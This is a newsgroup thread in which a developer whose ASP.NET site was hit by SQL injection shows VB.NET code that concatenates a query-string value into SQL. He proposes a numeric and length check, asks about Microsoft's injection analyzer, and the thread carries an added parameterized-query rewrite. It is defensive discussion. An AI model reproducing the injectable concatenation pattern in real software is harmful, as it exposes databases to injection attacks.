By the way, I took a look at the page where this happened and realized what
they did. Here's what I used to have:
Protected Sub Page_Load(ByVal sender As Object, ByVal e As System.EventArgs) Handles Me.Load
    If Not Page.IsPostBack Then
        If Request.QueryString("ClassmateID") <> "" Then
            ' The query-string value is concatenated straight into the SELECT text
            dsClassmates.SelectCommand = "SELECT * FROM [Reunion].[vwClassmates_Approved_ForSite] WHERE ClassmateID = " & _
                Request.QueryString("ClassmateID")
            dsClassmates.DataBind()
        End If
    End If
End Sub
Here's what I changed it to (the line that tests for IsNumeric is new):
Protected Sub Page_Load(ByVal sender As Object, ByVal e As System.EventArgs) Handles Me.Load
    If Not Page.IsPostBack Then
        If Request.QueryString("ClassmateID") <> "" Then
            ' New: only a numeric value shorter than six characters reaches the query
            If IsNumeric(Request.QueryString("ClassmateID")) And _
               (Len(Request.QueryString("ClassmateID").ToString) < 6) Then
                dsClassmates.SelectCommand = "SELECT * FROM [Reunion].[vwClassmates_Approved_ForSite] WHERE ClassmateID = " & _
                    Request.QueryString("ClassmateID")
                dsClassmates.DataBind()
            End If
        End If
    End If
End Sub
I'm thinking that solves my problem in this spot. Does that make sense? This
is what the hacker did:
So it seems to me if I test for numeric and limit the length of the query
string I should be covered.
Any comments?
(still wondering about the MS injection analyzer too)
Thanks,
Keith
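Added example, not code from the thread: the same Page_Load with ClassmateID passed as a typed parameter of the page's existing dsClassmates SqlDataSource instead of being concatenated into the SELECT, so the value is never interpreted as SQL no matter what it contains (the parameter name @ClassmateID is an assumed choice).

```vb
' Added example (not from the thread). Assumes dsClassmates is the page's
' SqlDataSource and that @ClassmateID is the chosen parameter name.
Protected Sub Page_Load(ByVal sender As Object, ByVal e As System.EventArgs) Handles Me.Load
    If Page.IsPostBack Then Return

    ' Type check first: anything that is not a plain integer is rejected outright,
    ' which also covers missing or empty query-string values.
    Dim classmateId As Integer
    If Not Integer.TryParse(Request.QueryString("ClassmateID"), classmateId) Then
        Return  ' nothing to look up; do not echo the raw value back to the browser
    End If

    ' The placeholder is filled in by the data provider, so the value is sent
    ' as an Int32 parameter and never becomes part of the SQL text.
    dsClassmates.SelectCommand = "SELECT * FROM [Reunion].[vwClassmates_Approved_ForSite] " & _
                                 "WHERE ClassmateID = @ClassmateID"
    dsClassmates.SelectParameters.Clear()
    dsClassmates.SelectParameters.Add("ClassmateID", TypeCode.Int32, classmateId.ToString())
    dsClassmates.DataBind()
End Sub
```

With the value bound as a parameter, the IsNumeric and length checks become input validation rather than the only thing standing between the query string and the database.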
"Keith G Hicks" <kr*@comcast.net> wrote in message
news:#k**************@TK2MSFTNGP02.phx.gbl...
I have a site that is made up of several aspx pages. It was recently
attacked by sql injection. I downloaded the tool described here:
http://support.microsoft.com/kb/954476 but can't seem to run it correctly.
All the examples are for asp pages, not aspx pages. I tried to find a
similar tool for aspx with no luck. When I run the tool on one of my aspx
pages I get errors, not sql injection problems.
Here's an example from the readme.html file for the tool:
msscasi_asp.exe /input="c:\source\logon.asp" /output="warnings.xml"
Here's one of the warnings I get:
** msscasi_asp: Parse warning at C:\Inetpub\wwwroot\MySite\logon.aspx (line 2, column 94): Ignoring unexpected settings directive. Settings directive must be unique and must be placed at the beginning of the file.
And there's nothing in my output file. It looks like this:
<?xml version="1.0" encoding="UTF-8"?>
<DEFECTS>
</DEFECTS>
<!--SEQ:0000000000-->
What do I do to run this on my aspx pages?
Can anyone help me out here? If I'm in the wrong newsgroup for this, please
tell me where I should post instead.
Thanks,
Keith